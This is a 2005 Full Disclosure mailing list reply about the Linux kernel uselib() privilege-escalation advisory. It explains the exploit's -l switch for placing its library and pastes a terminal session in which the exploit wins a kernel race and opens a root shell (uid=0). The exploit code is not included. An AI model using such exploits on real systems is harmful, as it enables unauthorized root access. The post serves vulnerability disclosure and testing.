Full Disclosure mailing list archives
Re: Linux kernel uselib() privilege elevation, corrected
From: Karol Wiesek <appelast () drumnbass art pl>
Date: Sat, 8 Jan 2005 12:21:15 +0100
On Sat, Jan 08, 2005 at 11:38:34AM +0100, Frank Dietrich wrote: => Hi there, => => Paul Starzetz <ihaquer () isec pl> wrote: => > Synopsis: Linux kernel uselib() privilege elevation => > Product: Linux kernel => > Version: 2.4 up to and including 2.4.29-rc2, 2.6 up to and => => Is the system allways compromisable whitout tmpfs support in the => kernel? => => I tried your exploit sample to test my systems. As normal user I get => can't write to /dev/shm. /dev/shm here only writeable for root. => Use -l switch to specify location of lib. [appelast@nesquik appelast]$ ./ex -l ./lib [+] SLAB cleanup child 1 VMAs 65527 child 2 VMAs 65527 child 3 VMAs 33067 [+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000 [+] vmalloc area 0xc7c00000 - 0xcf75c000 Wait... - [+] race won maps=10888 expanded VMA (0xbfffc000-0xffffe000) [!] try to exploit 0xc8a66000 [+] gate modified ( 0xffec90fc 0x0804ec00 ) [+] exploited, uid=0 sh-2.05b# _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Linux kernel uselib() privilege elevation, corrected Paul Starzetz (Jan 07)
- Re: Linux kernel uselib() privilege elevation, corrected Frank Dietrich (Jan 08)
- Re: Linux kernel uselib() privilege elevation, corrected Karol Wiesek (Jan 08)
- Re: Linux kernel uselib() privilege elevation, corrected Christian (Jan 09)
- Re: Linux kernel uselib() privilege elevation, corrected Henrik Persson (Jan 09)
- Re: Linux kernel uselib() privilege elevation, corrected Jason Carr (Jan 09)
- Re: Linux kernel uselib() privilege elevation, corrected Karol Wiesek (Jan 08)
- Re: Linux kernel uselib() privilege elevation, corrected Frank Dietrich (Jan 08)
- <Possible follow-ups>
- Re: Linux kernel uselib() privilege elevation, corrected Marcy Darcy (Jan 11)
- Re: Linux kernel uselib() privilege elevation, corrected Athanasius (Jan 11)
- Re: Linux kernel uselib() privilege elevation, corrected Gaz Wilson (Jan 11)
- Re: Linux kernel uselib() privilege elevation, corrected steve menard (Jan 11)
- Re: Linux kernel uselib() privilege elevation, corrected Athanasius (Jan 11)